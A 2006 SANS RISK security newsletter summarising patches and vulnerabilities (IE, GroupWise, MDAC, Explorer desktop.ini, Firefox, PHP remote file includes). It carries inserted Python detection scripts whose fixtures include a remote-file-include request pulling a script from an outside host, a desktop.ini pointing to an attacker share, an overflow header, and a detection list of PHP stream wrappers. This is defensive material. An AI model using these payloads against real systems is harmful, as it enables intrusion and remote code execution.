 
RISK: The Consensus Security Vulnerability Alert Vol. 5 No. 15

From: The SANS Institute (ConsensusSecurityVulnerabilityAlert@sans.org)
Date: Mon Apr 17 2006 - 13:34:06 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Windows vulnerabilities and patches dominate this week's report, but
Novell and Firefox users also have work to do.

Before looking at this week's RISK, please complete this brief survey
and email it to top20@sans.org.

The SANS 2005 Top20 Internet Security Vulnerabilities was done
differently than in previous years.
(a) Cross platform and application product vulnerabilities and
networking equipment vulnerabilities were added to the operating system
vulnerabilities.
(b) The vulnerabilities covered in the 2005 study spanned a year and
half of vulnerability data instead of trying to cover all of history.

Q1. Do you think those changes added value or made the Top-20 less
valuable?

Q2. We are discussing moving to semi-annual updates. What are the pros
and cons, from your perspective of moving to semi-annual updates?

Q4. What other data in the Top-20 would make this list more helpful?

Please send the answers and any other comments or concerns you have to
top20@sans.org.

                           Alan

*************************************************************************
          RISK: The Consensus Security Vulnerability Alert
April 17, 2006 Vol. 5. Week 15
*************************************************************************

RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:
=================================================================
Platform                                # of Updates & Vulnerabilities
=================================================================
Windows                                  3 (#4)
Other Microsoft Products                 6 (#1, #3, #6)
Third Party Windows Apps                 1 (#11)
Linux                                    3
BSD                                      3
Solaris                                  2
Unix                                     1
Novell                                   1 (#2)
Cross Platform                          10 (#5, #10)
Web Application - Cross Site Scripting  19
Web Application - SQL Injection         12 (#9)
Web Application                         22 (#7, #8)

******************* Sponsored By Blue Lane Technologies *****************

Instant patch protection for Oracle without touching the server!

The Blue Lane(tm) Technologies PatchPoint(tm) System provides the only
patch alternative that can help you put an end to the patching cycle.
Eliminate reactive server patching, preserve application availability,
and reduce the risk in deploying patches to critical servers.
End your patch headaches today.
http://www.sans.org/info.php?id=1106

*************************************************************************

Part I -- Critical Vulnerabilities from TippingPoint, a division of 3Com
(www.tippingpoint.com)

Widely Deployed Software
(1) CRITICAL: Internet Explorer Cumulative Security Update (MS06-013)
(2) CRITICAL: Novell GroupWise Messenger Buffer Overflow
(3) HIGH: Microsoft Data Access Components Remote Code Execution (MS06-014)
(4) HIGH: Windows Explorer Remote Code Execution (MS06-015)
(5) HIGH: Mozilla, Firefox, Thunderbird Multiple Vulnerabilities
(6) MODERATE: Cumulative Security Update for Outlook Express (MS06-016)

Other Software
(7) HIGH: Multiple Software Remote File Include Vulnerabilities

Exploit Code/Details
(8) Horde Help Viewer Remote PHP Code Execution
(9) Symantec Sygate Management Server SQL Injection
(10) RealPlayer .SWF File Code Execution
(11) Sybase EAServer Buffer Overflow

************************ Sponsored Links ********************************
1) "Expediting Patching with Nuclear Fuels" - Free Webcast tomorrow -
a WhatWorks in Vulnerability Management webcast
Tuesday, April 18 at 1:00 PM EDT (1700 UTC/GMT)
http://www.sans.org/info.php?id=1107

2) from the SANS WhatWorks Poster - Free Vendor White Papers on a
wide range of security topics - http://www.sans.org/info.php?id=1108

3) SANS OnSite InfoSec Training Your Location! Your Schedule! Lower
Cost! http://www.sans.org/info.php?id=1109
*************************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)

 -- Windows
06.15.1 - Microsoft Internet Explorer COM Object Instantiation Code Execution
06.15.2 - Microsoft Outlook Express Windows Address Book File Parsing Buffer Overflow
06.15.3 - Microsoft Windows Shell COM Object Remote Code Execution
 -- Other Microsoft Products
06.15.4 - Internet Explorer Invalid HTML Parsing Code Execution
06.15.5 - Microsoft Internet Explorer Double Byte Character Memory Corruption
06.15.6 - Internet Explorer Erroneous IOleClientSite Data Zone Bypass
06.15.7 - Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution
06.15.8 - Internet Explorer Persistent Window Content Address Bar Spoofing
06.15.9 - Microsoft Internet Explorer HTML Tag Memory Corruption
 -- Third Party Windows Apps
06.15.10 - TUGZip Remote Directory Traversal
 -- Linux
06.15.11 - Linux Kernel __keyring_search_one Local Denial of Service
06.15.12 - mnoGoSearch-Common Local Database Administrator Password Disclosure
06.15.13 - Linux Kernel Perfmon.c Local Denial of Service
 -- BSD
06.15.14 - NetBSD False Intel Hardware RNG Detection Predictable Random Number Generation Weakness
06.15.15 - NetBSD SIOCGIFALIAS IOCTL Local Denial of Service
06.15.16 - NetBSD Sysctl Local Denial of Service
 -- Solaris
06.15.17 - Sun Solaris SH Local Denial of Service
06.15.18 - Sun Solaris LDAP2 RootDN Password Disclosure
 -- Unix
06.15.19 - Sybase EAServer Manager Connection Cache Password Disclosure
 -- Novell
06.15.20 - Novell GroupWise Messenger Accept Language Remote Buffer Overflow
 -- Cross Platform
06.15.21 - Oracle Database Access Restriction Bypass
06.15.22 - Imager JPEG and TGA Images Denial of Service
06.15.23 - fbida FBGS Insecure Temporary File Creation
06.15.24 - Cyrus SASL Remote Digest-MD5 Denial of Service
06.15.25 - XScreenSaver Local Password Disclosure
06.15.26 - Firefox HTML Parsing Null Pointer Dereference Denial of Service
06.15.27 - Adobe Document Server for Reader Extensions Multiple Remote Vulnerabilities
06.15.28 - W3C Amaya Multiple Remote Buffer Overflow Vulnerabilities
06.15.29 - Adobe LiveCycle OBSOLETE User Access Validation
06.15.30 - Opera Web Browser Stylesheet Attribute Buffer Overflow
 -- Web Application - Cross Site Scripting
06.15.31 - phpMyForum Index.PHP Multiple Cross-Site Scripting Vulnerabilities
06.15.32 - PHPWebGallery Multiple Cross-Site Scripting Vulnerabilities
06.15.33 - MyBulletinBoard Newthread.PHP Cross-Site Scripting
06.15.34 - Shadowed Portal Load.PHP Cross-Site Scripting
06.15.35 - MyBulletinBoard Multiple HTML Injection Vulnerabilities
06.15.36 - TalentSoft Web+ Shop Deptname Parameter Cross-Site Scripting
06.15.37 - JBook Index.PHP Cross-Site Scripting
06.15.38 - Gallery Unspecified Cross-Site Scripting
06.15.39 - XMB Forum Flash Video Cross-Site Scripting
06.15.40 - SWSoft Confixx Jahr Parameter Cross-Site Scripting
06.15.41 - JetPhoto Multiple Cross-Site Scripting Vulnerabilities
06.15.42 - Tritanium Bulletin Board Multiple Cross-Site Scripting Vulnerabilities
06.15.43 - Manila Multiple Cross-Site Scripting Vulnerabilities
06.15.44 - Autogallery Multiple Cross-Site Scripting Vulnerabilities
06.15.45 - interaktiv.shop Multiple Cross-Site Scripting Vulnerabilities
06.15.46 - phpMyAdmin SQL.PHP Cross-Site Scripting
06.15.47 - MyBB Member.PHP Cross-Site Scripting
06.15.48 - Simplog Login.PHP Cross-Site Scripting
06.15.49 - PatroNet CMS Index.PHP Cross-Site Scripting
 -- Web Application - SQL Injection
06.15.50 - XBrite Members.PHP SQL Injection
06.15.51 - APT-webshop Modules.PHP Multiple SQL Injection Vulnerabilities
06.15.52 - dnGuestbook Admin.PHP SQL Injection Vulnerabilities
06.15.53 - ShopWeezle Multiple SQL Injection Vulnerabilities
06.15.54 - Clansys Index.PHP SQL Injection
06.15.55 - JBook Form.PHP SQL Injection Vulnerabilities
06.15.56 - Dokeos Viewtopic.PHP SQL Injection
06.15.57 - PHPKIT Include.PHP SQL Injection
06.15.58 - SWSoft Confixx Index.PHP SQL Injection
06.15.59 - Chipmunk Guestbook Index.PHP SQL Injection
06.15.60 - Simplog Multiple SQL Injection Vulnerabilities
06.15.61 - PHP121 PHP121LOGIN.PHP SQL Injection
 -- Web Application
06.15.62 - PHPList Index.PHP Local File Include
06.15.63 - SIRE Arbitrary File Upload
06.15.64 - SPIP Spip_login.PHP Remote File Include
06.15.65 - VegaDNS Multiple Input Validation Vulnerabilities
06.15.66 - SQuery LibPath Parameter Multiple Remote File Include Vulnerabilities
06.15.67 - AWeb's Scripts Seller Buy.PHP Authorization Bypass
06.15.68 - Matt Wright Guestbook Guestbook.PL Multiple HTML Injection Vulnerabilities
06.15.69 - PHP Multiple Safe_Mode and Open_Basedir Restriction Bypass Vulnerabilities
06.15.70 - VWar Admin.PHP Remote File Include
06.15.71 - AzDGVote Remote File Include
06.15.72 - SmartISoft phpListPro Config.PHP Remote File Include
06.15.73 - Clever Copy Connect.INC Information Disclosure
06.15.74 - Blursoft Blur6ex Multiple Input Validation Vulnerabilities
06.15.75 - Phgstats Phgstats.Inc.PHP Remote File Include
06.15.76 - Indexu Multiple Remote File Include Vulnerabilities
06.15.77 - Saxopress URL Parameter Directory Traversal
06.15.78 - MvBlog Multiple Input Validation Vulnerabilities
06.15.79 - Plone MembershipTool Access Control Bypass
06.15.80 - Simplog Remote File Include
06.15.81 - SimpleBBS Remote Arbitrary Command Execution
06.15.82 - Censtore Remote Arbitrary Command Execution
06.15.83 - Sphider Configset.PHP Remote File Include

_____________________________________________________________________

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar at TippingPoint, a division of
3Com, as a by-product of that company's continuous effort to ensure that
its intrusion prevention products effectively block exploits using known
vulnerabilities. TippingPoint's analysis is complemented by input from
a council of security managers from twelve large organizations who
confidentially share with SANS the specific actions they have taken to
protect their systems. A detailed description of the process may be
found at http://www.sans.org/newsletters/cva/#process
Archives at http://www.sans.org/newsletters/risk

*************************
Widely Deployed Software
*************************

(1) CRITICAL: Internet Explorer Cumulative Security Update (MS06-013)
Affected:
Internet Explorer versions 5.01 and 6.0

Description: Microsoft has released a cumulative security update for
Internet Explorer that fixes multiple vulnerabilities as well as
provides enhanced security checks for ActiveX controls. This update
addresses the 0-day flaw in IE's "createTextRange" function that is
being actively exploited. The update fixes the following 8 remote code
execution vulnerabilities that can be exploited by a malicious webpage
to execute arbitrary code on a user's system.

(a) IE contains a memory corruption vulnerability when methods designed
for certain HTML objects are applied to other HTML objects.

(b) IE contains a memory corruption vulnerability that can be triggered
by an HTML page containing a hundred or more script event handlers such
as "onclick", "onmouseover", etc.

(c) IE's security checks and a user dialog box can be bypassed by a
malicious HTML application.

(d) IE contains a memory corruption vulnerability in handling specially
crafted HTML code.

(e) IE contains a memory corruption vulnerability in instantiating COM
objects that were not originally designed to be used in that fashion.

(f) IE contains a memory corruption vulnerability in handling a
specially crafted tag in an HTML element.

(g) IE contains a memory corruption vulnerability in handling specially
crafted URLs with Double-Byte character sets.

(h) IE contains a remote code execution vulnerability in handling
dynamically created embedded objects.

In addition to these remote code execution vulnerabilities, the patch
also addresses an information disclosure and a spoofing vulnerability
(reported last week). The patch sets the kill bit for the ActiveX
controls included with Danim.dll and Dxtmsft.dll. The technical details
for a number of these flaws have not been publicly posted yet.

Status: Apply the patch referenced in Microsoft Security Bulletin
MS06-013 as soon as possible. Microsoft has already documented known
issues that occur after applying this update; review KB912812
(http://support.microsoft.com/kb/912812) before deploying it.

Council Site Actions: All reporting council sites are responding to
this item. Some of the sites are updating their systems on an
accelerated schedule, while others are using their normal update
process. The desktop systems are on a longer update cycle due to the
need for more extensive regression testing.

References:
Microsoft Security Bulletin MS06-013
http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
Additional IE Vulnerabilities (not yet patched)
http://archives.neohapsis.com/archives/bugtraq/2006-04/0248.html
Previous RISK Postings
http://www.sans.org/newsletters/risk/display.php?v=5&i=11#widely4
(Script Handler Memory Corruption)
http://www.sans.org/newsletters/risk/display.php?v=5&i=12#widely1
(CreateTextRange Remote Code Execution)
http://www.sans.org/newsletters/risk/display.php?v=5&i=14#widely2
(Address Bar Spoofing)
SecurityFocus BIDs
http://www.securityfocus.com/bid/17450
http://www.securityfocus.com/bid/17453
http://www.securityfocus.com/bid/17454
http://www.securityfocus.com/bid/17455
http://www.securityfocus.com/bid/17457
http://www.securityfocus.com/bid/17460
http://www.securityfocus.com/bid/17468

****************************************************************

(2) CRITICAL: Novell GroupWise Messenger Buffer Overflow
Affected:
Novell GroupWise Messenger version 2.0

Description: Novell GroupWise Messenger is an instant messaging solution
for internal communications in an organization. The Messenger server
runs a web server on port 8300/tcp by default. This web server contains
a buffer overflow that can be triggered by an HTTP request with the
"Accept-Language" HTTP header longer than 16 bytes. The flaw can be
exploited to execute arbitrary code on the Messenger server with
"SYSTEM/root" privileges. Exploit code has been publicly posted.
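
As an added example (not from the bulletin, Novell or TippingPoint), the
following Python check applies the trigger condition quoted above to raw
HTTP requests: it parses the header block, joins folded continuation lines
and repeated headers so a value split across lines is measured as a whole,
and flags an Accept-Language value longer than 16 bytes. The sample
requests are constructed for illustration.

```python
# Added example (not from the bulletin, Novell or TippingPoint): flag HTTP
# requests whose Accept-Language value exceeds the 16-byte limit quoted
# above for Novell GroupWise Messenger. Sample requests are constructed.

MAX_ACCEPT_LANGUAGE = 16  # threshold quoted in the bulletin


def parse_headers(raw: bytes) -> dict:
    """Parse the header block of a raw HTTP request.

    Returns {lowercased-name: value}. Folded continuation lines are joined
    onto the previous header and repeated headers are concatenated with
    ", ", so a value split across lines is measured as a whole.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = {}
    last = None
    for line in head.split(b"\r\n")[1:]:  # [0] is the request line
        if line[:1] in (b" ", b"\t") and last is not None:
            headers[last] += b" " + line.strip()
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            continue
        last = name.strip().lower()
        if last in headers:
            headers[last] += b", " + value.strip()
        else:
            headers[last] = value.strip()
    return headers


def is_groupwise_acceptlang_attack(raw: bytes) -> bool:
    """True when the request carries an Accept-Language longer than 16 bytes."""
    value = parse_headers(raw).get(b"accept-language")
    return value is not None and len(value) > MAX_ACCEPT_LANGUAGE


def scan_requests(requests) -> list:
    """Indexes of the requests that match the overflow trigger."""
    return [i for i, r in enumerate(requests) if is_groupwise_acceptlang_attack(r)]


# Constructed sample traffic, as it would arrive on the Messenger port.
BENIGN = (b"GET / HTTP/1.1\r\nHost: gwim.example\r\n"
          b"Accept-Language: en-US,en\r\n\r\n")
FOLDED = (b"GET / HTTP/1.1\r\nHost: gwim.example\r\n"
          b"Accept-Language: en-US,\r\n de-DE,fr-FR,ja-JP\r\n\r\n")
ATTACK = (b"GET / HTTP/1.1\r\nHost: gwim.example\r\n"
          b"Accept-Language: " + b"A" * 64 + b"\r\n\r\n")

if __name__ == "__main__":
    for i in scan_requests([BENIGN, FOLDED, ATTACK]):
        print(f"request {i}: oversized Accept-Language")
```

Scope such a rule to traffic bound for the Messenger web server (8300/tcp
by default): ordinary browsers routinely send Accept-Language values longer
than 16 bytes, so applied to general web traffic it would fire constantly.
The folded sample is flagged deliberately; the length that matters is the
value the server reassembles, not any single line.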

Status: Novell has released version 2.0 Beta2 to fix this issue. The fix
will also be included in the 2.0 service pack.

Council Site Actions: The affected software and/or configuration are not
in production or widespread use, or are not officially supported at any
of the council sites. They reported that no action was necessary.

References:
Novell Advisory
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm
ZDI Advisory
http://archives.neohapsis.com/archives/bugtraq/2006-04/0265.html
Exploit Code
http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html
http://metasploit.com/projects/Framework/exploits.html#novell_messenger_acceptlang
Product Homepage and Information
http://www.novell.com/collateral/4613331/4613331.html
http://www.novell.com/coolsolutions/feature/9840.html
SecurityFocus BIDs
http://www.securityfocus.com/bid/17503

********************************************************************

(3) HIGH: Microsoft Data Access Components Remote Code Execution (MS06-014)
Affected:
Windows installations with:
Microsoft Data Access Components version 2.5 SP3, 2.7 SP1, 2.8 and 2.8 SP1
Windows XP/2003 (default configuration)

Description: Microsoft Data Access Components (MDAC) is a collection of
functions that provide support for common database operations, such as
connecting to remote databases and returning data to a client. The
RDS.Dataspace ActiveX control, that ships as a part of MDAC, contains a
remote code execution vulnerability. A malicious webpage or an HTML
email invoking the ActiveX control with crafted parameters can
compromise a user's system. The technical details required to leverage
this flaw have not been publicly posted yet.

Status: Apply the patch referenced in the Microsoft Security Bulletin
MS06-014.

Council Site Actions: All reporting council sites are responding to
this item. Some of the sites are updating their systems on an
accelerated schedule, while others are using their normal update
process. One site voiced some concerns that internal apps may be
impacted since the patch addresses some ActiveX behavior. The desktop
systems are on a longer update cycle due to the need for more extensive
regression testing.

References:
Microsoft Security Bulletin MS06-014
http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
RDS Tutorial
http://msdn.microsoft.com/library/en-us/ado270/htm/mdmsctherdsprogrammingmodelindetail.asp
SecurityFocus BID
http://www.securityfocus.com/bid/176463

****************************************************************

(4) HIGH: Windows Explorer Remote Code Execution (MS06-015)
Affected:
Windows 2000/XP/2003

Description: "desktop.ini" is a hidden file that, when present in a
folder, tells Windows Explorer how to display that folder's contents. A
problem arises when the ".ShellClassInfo" section of a folder's
desktop.ini points to an executable program: Explorer runs it when an
unsuspecting user opens the folder, so a specially crafted folder leads
to arbitrary code execution on the client system. A second way to build
a malicious folder exists but has not been publicly disclosed. To exploit
the flaw, an attacker creates a malicious shared folder and entices the
victim to open it over SMB or WebDAV, for example by placing the folder's
path (\\attacker-ip\bad-folder for SMB, http://attacker-ip/bad-folder for
WebDAV) in a webpage or emailing it to the potential victim.
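
An added example, not from the bulletin or from Microsoft: a Python audit
that walks a share looking for desktop.ini files whose [.ShellClassInfo]
section binds the folder to a COM class or points at a remote or
executable resource, the kind of folder the description above warns
about. The key names are the documented .ShellClassInfo keys; the
suspicious-value rules, the sample file contents and the placeholder GUID
are this example's own.

```python
# Added example (not from the bulletin or from Microsoft): audit desktop.ini
# files on a share for a [.ShellClassInfo] section that hands Explorer
# something to load when the folder is opened. Key names are the documented
# .ShellClassInfo keys; the suspicious-value rules and the sample files
# below are this example's own.
import configparser
from pathlib import Path

CODE_KEYS = {"clsid", "clsid2", "uiclsid"}          # bind the folder to a COM class
EXEC_EXTS = {".exe", ".dll", ".scr", ".com", ".cpl", ".ocx"}


def is_local_absolute(p: str) -> bool:
    """Drive-letter or %SystemRoot%-style path on the local machine."""
    return p.startswith("%") or (len(p) > 2 and p[1] == ":" and p[2] == "\\")


def audit_desktop_ini(text: str) -> list:
    """Return findings (strings) for the contents of one desktop.ini."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.lower
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        if section.lower() != ".shellclassinfo":
            continue
        for key, value in cp.items(section):
            v = value.strip().strip('"')
            if key in CODE_KEYS:
                findings.append(f"{key}={v}: folder bound to a COM class that Explorer loads on open")
            if v.startswith("\\\\") or "://" in v:
                findings.append(f"{key}={v}: references a remote (UNC or URL) resource")
            module = v.split(",")[0]                  # strip an ",index" icon suffix
            if Path(module).suffix.lower() in EXEC_EXTS and not is_local_absolute(module):
                findings.append(f"{key}={v}: loads an executable module from a non-local path")
    return findings


def scan_tree(root) -> dict:
    """Map each desktop.ini under root (case-sensitive name) to its findings."""
    results = {}
    for ini in Path(root).rglob("desktop.ini"):
        try:
            findings = audit_desktop_ini(ini.read_text(encoding="utf-8", errors="replace"))
        except configparser.Error as exc:
            findings = [f"unparseable: {exc}"]
        if findings:
            results[str(ini)] = findings
    return results


# Constructed sample contents (not taken from any real share).
BENIGN_INI = (
    "[.ShellClassInfo]\n"
    "IconResource=%SystemRoot%\\system32\\shell32.dll,3\n"
    "InfoTip=Shared documents\n"
)
SUSPICIOUS_INI = (
    "[.ShellClassInfo]\n"
    "CLSID2={00000000-0000-0000-0000-000000000000}\n"   # placeholder GUID
    "IconFile=\\\\attacker-ip\\bad-folder\\icon.dll\n"
)

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_INI), ("suspicious", SUSPICIOUS_INI)):
        print(name, audit_desktop_ini(text))
```

A local icon resource such as shell32.dll is normal and is not flagged;
only COM bindings, UNC/URL references and executables outside a local
absolute path are reported. Run scan_tree against a mounted share to
review what users will be opening; it reads the files, it does not open
the folders in Explorer.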

Status: Apply the patch referenced in Microsoft Security Bulletin
MS06-015. Blocking 139/tcp and 445/tcp at the perimeter removes the SMB
vector but not the WebDAV one, which travels over ordinary HTTP, so
port filtering is a mitigation rather than a substitute for the patch.

Council Site Actions: All reporting council sites are responding to
this item. Some of the sites are updating their systems on an
accelerated schedule, while others are using their normal update
process. The desktop systems are on a longer update cycle due to the
need for more extensive regression testing.

References:
Microsoft Security Bulletin
http://www.microsoft.com/technet/security/Bulletin/MS06-015.mspx
Previous RISK Newsletter Posting from 2004
http://www.sans.org/newsletters/risk/vol3_20.php (Item #4)
SecurityFocus BID
http://www.securityfocus.com/bid/17464

****************************************************************

(5) HIGH: Mozilla, Firefox, Thunderbird Multiple Vulnerabilities
Affected:
Firefox versions prior to 1.5.0.2
Mozilla versions prior to 1.7.13
Thunderbird versions prior to 1.5.0.2
SeaMonkey versions prior to 1.0.1

Description: The Mozilla Foundation has released security updates for the
Mozilla and Firefox browsers, the Thunderbird email client and the
SeaMonkey suite. The updates fix 11 vulnerabilities that a malicious
webpage can exploit to execute arbitrary code on a user's system, plus 8
further vulnerabilities involving spoofing, cross-site scripting and
information disclosure. Technical details and exploit code are recorded
in Mozilla's Bugzilla but will not be publicly accessible during the
patch period.

Status: Upgrade to Firefox and Thunderbird version 1.5.0.2, Mozilla
version 1.7.13 and SeaMonkey version 1.0.1. Ensure that users turn on
the "automatic download and update installation" option in the
Tools->Advanced->Update menu for the software.

References:
Mozilla Advisories
http://www.mozilla.org/security/announce/2006/mfsa2006-09.html
http://www.mozilla.org/security/announce/2006/mfsa2006-10.html
http://www.mozilla.org/security/announce/2006/mfsa2006-11.html
http://www.mozilla.org/security/announce/2006/mfsa2006-12.html
http://www.mozilla.org/security/announce/2006/mfsa2006-13.html
http://www.mozilla.org/security/announce/2006/mfsa2006-14.html
http://www.mozilla.org/security/announce/2006/mfsa2006-15.html
http://www.mozilla.org/security/announce/2006/mfsa2006-16.html
http://www.mozilla.org/security/announce/2006/mfsa2006-17.html
http://www.mozilla.org/security/announce/2006/mfsa2006-18.html
http://www.mozilla.org/security/announce/2006/mfsa2006-19.html
http://www.mozilla.org/security/announce/2006/mfsa2006-20.html
http://www.mozilla.org/security/announce/2006/mfsa2006-22.html
http://www.mozilla.org/security/announce/2006/mfsa2006-23.html
http://www.mozilla.org/security/announce/2006/mfsa2006-24.html
http://www.mozilla.org/security/announce/2006/mfsa2006-25.html
http://www.mozilla.org/security/announce/2006/mfsa2006-28.html
http://www.mozilla.org/security/announce/2006/mfsa2006-29.html
ZDI Advisory
http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0350.html
SecurityFocus BID
http://www.securityfocus.com/bid/17516

****************************************************************

(6) MODERATE: Cumulative Security Update for Outlook Express (MS06-016)
Affected:
Windows 2000/XP/2003

Description: Microsoft has released a cumulative security update for
Outlook Express that fixes a buffer overflow vulnerability. The flaw is
triggered when Outlook Express tries to parse a specially crafted
Windows Address Book (.wab) file. The overflow can be exploited to
execute arbitrary code on a user's system. In order to exploit the
overflow, an attacker has to host a webpage containing a malicious wab
file or send it to the victims as an email attachment. Note that user
interaction is required to open the wab file. The technical details
required to craft a malicious wab file have not been posted yet.

Status: Apply the patch referenced in the Microsoft Security Bulletin
MS06-016.

Council Site Actions: All reporting council sites are responding to this
item. Some of the sites are updating their systems on an accelerated
schedule, while others are using their normal update process. The
desktop systems are on a longer update cycle due to the need for more
extensive regression testing.

References:
Microsoft Security Bulletin
http://www.microsoft.com/technet/security/Bulletin/MS06-016.mspx
SecurityFocus BID
http://www.securityfocus.com/bid/17459

****************************************************************

***************
Other Software
***************

(7) HIGH: Multiple Software Remote File Include Vulnerabilities

Description: The following moderately to widely used web software
packages reportedly contain remote file include vulnerabilities:
vBulletin, Simplog, PAJAX, sphider, phpListPro, phpWebSite and Indexu.
A remote attacker can exploit these flaws to run arbitrary code on the
webserver hosting the vulnerable package. The postings show how to craft
the malicious HTTP requests that trigger each flaw.
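
As an added example (not from any of the advisories or postings cited
below), the following Python detection parses combined-format web access
log entries and flags query parameters whose decoded value names a remote
URL or a PHP stream wrapper, the request shape a remote file include
exploit uses. The log lines, the /app/include.php path and the "lib"
parameter are constructed for illustration, not taken from the postings.

```python
# Added example (not from the advisories or postings cited): scan web
# server access logs for requests that pass a remote URL or PHP stream
# wrapper in a query parameter, the request shape a remote file include
# exploit uses. Log lines, the /app/include.php path and the "lib"
# parameter are constructed for illustration.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx combined log format: client, identd, user, [time], "request", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:", "expect://")


def rfi_params(target: str) -> list:
    """(name, raw_value) pairs whose decoded value names a remote/stream resource."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decoded once; a second pass catches %25xx double encoding
        decoded = unquote(value).strip().lower()
        if decoded.startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def scan_access_log(lines) -> list:
    """One alert dict per log line whose request carries an RFI-shaped parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                 # not combined format; skip rather than guess
        hits = rfi_params(m["target"])
        if hits:
            alerts.append({"ip": m["ip"], "status": m["status"],
                           "target": m["target"], "params": hits})
    return alerts


# Constructed sample log lines.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Apr/2006:10:02:11 -0500] "GET /app/index.php?page=about HTTP/1.1" 200 5123',
    '198.51.100.7 - - [17/Apr/2006:10:02:15 -0500] '
    '"GET /app/include.php?lib=http://198.51.100.7/s.txt? HTTP/1.1" 200 812',
    '198.51.100.7 - - [17/Apr/2006:10:02:19 -0500] '
    '"GET /app/include.php?lib=%2568ttp%253A%252F%252F198.51.100.7%252Fs.txt HTTP/1.1" 200 812',
    '203.0.113.9 - - [17/Apr/2006:10:03:02 -0500] "GET /app/include.php?lib=../../etc/passwd HTTP/1.1" 404 211',
]

if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_LOG):
        print(a["ip"], a["status"], a["params"])
```

The raw parameter value is kept in the alert so an analyst sees exactly
what was sent; the trailing "?" in the second sample is the usual trick
for neutralising whatever the vulnerable script appends to the path. The
directory-traversal line is left alone on purpose: it is a different bug
class and deserves its own rule. On the server side, the vendor patches
are the fix for each package; setting allow_url_fopen = Off in php.ini
and allow-listing include paths in the application remove the class of
bug rather than the instance.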

References:
vBulletin
Posting by ReZEN
http://www.milw0rm.com/exploits/1668
http://archives.neohapsis.com/archives/bugtraq/2006-04/0247.html
SecurityFocus BID
http://www.securityfocus.com/bid/17206
Simplog
Posting by rgod
http://archives.neohapsis.com/archives/bugtraq/2006-04/0232.html
Vendor Homepage
http://www.simplog.org/
SecurityFocus BID
http://www.securityfocus.com/bid/17490
phpWebSite
Posting by rgod
http://www.milw0rm.com/exploits/1673
SecurityFocus BID
http://www.securityfocus.com/bid/17521
PAJAX
Posting by RedTeam
http://www.milw0rm.com/exploits/1672
SecurityFocus BID
http://www.securityfocus.com/bid/17519
phpListPro
Posting by Aesthetico
http://archives.neohapsis.com/archives/bugtraq/2006-04/0206.html
SecurityFocus BID
http://www.securityfocus.com/bid/17448
sphider
Posting by rgod
http://www.milw0rm.com/exploits/1665
SecurityFocus BID
http://www.securityfocus.com/bid/17514
Indexu
Posting by Sniper
http://www.securityfocus.com/archive/1/430599
SecurityFocus BID
http://www.securityfocus.com/bid/17470

**********************************************************************

*********************
Exploit Code/Details
*********************

(8) Horde Help Viewer Remote PHP Code Execution

References:
Exploit Code
http://downloads.securityfocus.com/vulnerabilities/exploits/horde_help_module.pm
Previous RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=5&i=13#06.13.89

**********************************************************************

(9) Symantec Sygate Management Server SQL Injection

References:
Exploit Code
http://metasploit.com/projects/Framework/exploits.html#sygate_policy_manager
Previous RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=5&i=5#other1

***********************************************************************

(10) RealPlayer .SWF File Code Execution

Council Site Updates: The software is not officially supported at any
of the reporting council sites. However a few sites plan to upgrade
their systems during the next regularly scheduled patch cycle. One site
has already updated their systems.

References:
Posting by NevisLabs
http://archives.neohapsis.com/archives/bugtraq/2006-04/0207.html
Previous RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=5&i=12#widely3

***********************************************************************

(11) Sybase EAServer Buffer Overflow

References:
Exploit Code
http://metasploit.com/projects/Framework/exploits.html#sybase_easerver
Previous RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=4&i=29#other2

****************************************************************

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 15, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 4974 unique vulnerabilities. For this
special SANS community listing, Qualys also includes vulnerabilities
that cannot be scanned remotely.

______________________________________________________________________

06.15.1 CVE: CVE-2006-1186
Platform: Windows
Title: Microsoft Internet Explorer COM Object Instantiation Code
Execution
Description: Microsoft Internet Explorer is prone to a memory
corruption vulnerability that is related to the instantiation of COM
objects. The vulnerability arises because of the way Internet Explorer
attempts to instantiate certain COM objects as ActiveX controls. The
COM objects may let remote attackers corrupt process memory and
facilitate arbitrary code execution in the context of the currently
logged in user on the affected computer.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________

06.15.2 CVE: CVE-2006-0014
Platform: Windows
Title: Microsoft Outlook Express Windows Address Book File Parsing
Buffer Overflow
Description: Microsoft Outlook Express is prone to a remote buffer
overflow vulnerability. Specifically, this vulnerability presents
itself when the application processes a specially crafted Windows
Address Book (.wab) file.
